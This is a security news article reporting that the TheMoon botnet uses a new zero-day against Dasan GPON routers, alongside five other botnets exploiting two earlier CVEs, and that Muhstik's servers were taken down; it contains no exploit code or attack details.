GPON zero-day

Attacks on Dasan GPON routers are continuing to happen using two vulnerabilities disclosed last month, but today, researchers from Qihoo 360 Netlab have revealed that one botnet operator appears to have deployed a new zero-day affecting the same router types.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

"We tested this payload on two different versions of [Dasan] GPON home router," the Netlab team said, "all work."

TheMoon botnet behind new Dasan GPON zero-day

The botnet exploiting this new GPON router zero-day is called TheMoon, a very old threat that was first spotted in 2014 infecting Linux servers but has started switching to home routers IoT in recent years.

TheMoon is only the latest botnet to add support for exploiting Dasan GPON routers. Five botnets —Hajime, Mettle, Mirai, Muhstik, and Satori— have been exploiting two older exploits for almost a week.

The two exploits these five botnets were targeting are CVE-2018-10561 and CVE-2018-10562.

These two vulnerabilities allow attackers to take over affected devices —GPON routers made by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network and is a type of telecommunications technology for supporting internet connections via fiber optics lines.

Despite a botnet party, only 2% of GPON routers were hacked

Initially, it was believed the number of exposed devices was over one million, but the device maker later officially stated that the number of devices vulnerable to CVE-2018-10561 and CVE-2018-10562 was only 240,000.

The good news is that in spite of the large number of vulnerable devices, all five botnets trying to take advantage of these routers last week failed to do so. The reason was that the exploit packages they were trying to use failed to infect devices properly.

Netlab says that these five botnets managed to infect only around 2% of the entire pool of vulnerable GPON routers.

This might change in the upcoming days thanks to the new zero-day deployed by TheMoon botnet, but also because botnet operators have been working on improving their exploit payloads in the past days.

One of six botnets has been taken down —for now

Nonetheless, Netlab says that together with the partners from the security industry they have scored a victory for the good guys, as they have managed to take down the servers of the Muhstik botnet, one of the five botnets that were targeting GPON routers last week.

However, the victory may be short-lived, as Muhstik admins appear to be attempting to install new servers and resume their router hacking activities.

Related Articles:

All That Port 8000 Traffic This Week! Yeah, That's Satori Looking for New Bots

VPNFilter Can Also Infect ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE Devices

Botnet Party on GPON Routers

Patches Available for Dangerous Bugs in Popular Brand of IP Cameras

Prowli Malware Operation Infected Over 40,000 Servers, Modems, and IoT Devices